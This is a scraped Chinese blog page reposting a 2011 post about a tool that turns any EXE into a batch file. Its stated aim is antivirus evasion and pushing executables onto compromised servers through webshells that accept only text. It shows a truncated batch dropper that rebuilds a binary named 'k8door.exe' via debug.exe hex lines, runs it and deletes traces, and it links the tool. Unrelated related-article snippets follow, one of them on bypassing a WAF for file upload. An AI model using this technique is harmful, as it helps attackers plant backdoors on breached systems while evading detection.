http://qqhack8.blog.163.com/blog/static/114147985201126105626755/

这是我2011年的东西了,当时用此方法可免杀很多马,至今依然有很大的用处

比如有一些WebShell,特别菜刀无法直接上传exe文件时(当然该工具可传任意文件)

可通过此方法向目标上传任意文件(菜刀下载功能不可用或没VPS做WEB下载的情况)

现在依旧可用于类似奇葩环境,特别是S2环境很多时候仅能上传文本

[原创]3KB大小 EXE转BAT 工具原理以及编写思路

2011-03-06 22:56:26|  分类: 原创工具

这是我在某群里 看到 别人发出来的一分 所谓 “加密的” 批处理 研究下

本工具原理  以及  使用 方法 如图    “加密” 后的BAT 如同以下源码类似

真正懂编程的朋友 说错 只要懂点BAT  Debug 和 Hex是神马东西的朋友

我相信  你一看 下面的BAT 代码  就知道什怎么写这个工具  提示:97编程冠军

附件中 那个只有3KB 大小 命令行下操作的工具 我是用C 写的

运行  工具原理.bat  会输出一个样本 k8door.exe  上面有工具的详细 编写思路

=================我是分隔线================================

@echo e 0100 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 >>k8team
@echo e 0110 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 >>k8team
@echo e 0120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 >>k8team
@echo e 0130 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 >>k8team
。。。。。。。。这里省略N行。。。。。。。。。。。
@echo e 4100 ff
@echo rcx>>k8team
@echo 4000>>k8team
@echo n k8tmp>>k8team
@echo w>>k8team
@echo q>>k8team
@debug<k8team>nul
@Copy /b /y k8tmp k8door.exe
@start k8door.exe
@del k8t*

https://github.com/k8gege/K8tools/blob/master/k8exe2bat.exe

[原创]k8exe2bat任意文件转Bat工具(WebShell无法上传EXE解决方案)的更多相关文章

  1. Linux系统下curl命令上传文件,文件名包含逗号无法上传

    使用curl命令,将备份好的图片全部重新导入到seaweedfs,图片全部以存储在seaweedfs中的fid命令, fid中间有一个逗号,使用curl命令时报错: curl: (26) couldn ...

  2. abp ueditor 多图以及文件无法上传

    abp .net core使用ueditor遇到的问题:多图和上传文件无法上传,提示“http://请求错误”. 400 bad request解决办法: 因为abp默认启用了ValidateAnti ...

  3. Web应用:当文件超过100KB,无法上传,有种原因你想象不到

    今天下午2点多,突然发现凡是文件超过100KB的,在上传的时候都会卡住,但低于100KB的文件可以上传成功. 服务器端使用的是asp无组件上传,为什么突然出现这种问题呢? 我们知道,IIS默认上传限制 ...

  4. mac下svn无法上传.a文件的问题

    Xcode自带的svn和Versions以及一些其它工具都默认ignore".a"文件. 解决办法有两个: 方法一:使用命令行添加文件([转]原文在这) 1.打开终端,输入cd,空 ...

  5. .net项目中上传的图片或者文件太大 无法上传

    最近做项目的时候  用户提出要上传大图片  一张图片有可能十几兆  本来用的第三方的上传控件  有限制图片上传大小的设置 以前设置的是2M  按照用户的要求  以为直接将限制图片上传大小的设置改下就可 ...

  6. 关于cornerstone无法上传library文件的问题

    在CornerStone中先选中左边的项目: 然后在菜单栏里面选择View->ShowIgnoreItems, 再选择项目中的library文件,点击Add按钮即可上传到服务器:

  7. cvs 文件无法上传debug

    当时文件始终上传不成功时(一般先update后commit): cvs update filename report:move away filename ,it is in the way cvs ...

  8. nextcloud大文件无法上传

    I think that if u got a small /tmp like i had u cant upload big file…My /tmp = 462M so i can upload ...

  9. 当任意文件上传偶遇Safedog

    0x01 写在前面 渗透过程中可能会经常遭遇WAF,此时不要轻易放弃,绞尽脑汁竭尽全力,或许弹尽粮绝之时也是柳暗花明之日. 0x02 过狗上传 一次项目渗透过程中,找个一处上传功能 先上传图片,测试上 ...

随机推荐

  1. thymelead入门 git地址在文档最后

    流程:##### 流程###### 1:pom添加依赖 <dependency> <groupId>org.springframework.boot</groupId&g ...

  2. csu1804

    /* csu 1804 因为define和const总出错,到现在也不明白为什么 不知道define 和 const 出来的 mod 有什么区别 */ #include<iostream> ...

  3. dubbo入门学习 一SOA

    SOA是什么?SOA全英文是Service-Oriented Architecture,中文意思是中文面向服务编程,是一种思想,一种方法论,一种分布式的服务架构(具体可以百度). 用途:SOA解决多服 ...

  4. Scrum冲刺阶段3

    成员今日完成的任务 人员 任务 何承华 美化主界面 陈宇 后端设计 丁培辉 美化主界面 温志铭 主页面的设计 杨宇潇 主页面的设计 张主强 服务器构建 成员遇到的问题 人员 问题 何承华 主页面美化意 ...

  5. Meanshift均值漂移算法

      通俗理解Meanshift均值漂移算法  Meanshift车手?? 漂移?? 秋名山???   不,不,他是一组算法,  今天我就带大家来了解一下机器学习中的Meanshift均值漂移. Mea ...

  6. redis学习-散列表常用命令(hash)

    redis学习-散列表常用命令(hash)   hset,hmset:给指定散列表插入一个或者多个键值对 hget,hmget:获取指定散列表一个或者多个键值对的值 hgetall:获取所欲哦键值以及 ...

  7. web测试和app测试的区别

    功能上: 功能上没有什么区别,都是用同样的方法来写用例(等效.边界值...) 架构上: web是B/S架构(浏览器和服务器)代码更新后数据会同步,可以保证所有客户一致 app是C/S架构(客户端和服务 ...

  8. [f]聊天的时间格式化

    代码如下: 参数: t: 时间戳, type:返回格式(1:IM界面,其他:会话列表) function formartTime(t, type) { var oldtime = new Date(t ...

  9. c++实现对windwos 下socket 的封装(实现封包及拆包处理)

    SuperSocket.h #pragma once #include<string> #include<iostream> #include <WINSOCK2.H&g ...

  10. 【webpack】-- 自动刷新与解析

    前端需要频繁的修改js和样式,且需要根据浏览器的页面效果不断的做调整:而且往往我们的开发目录和本地发布目录不是同一个,修改之后需要发布一下:另外一点就是并不是所有的效果都可以直接双击页面就能看到,我们 ...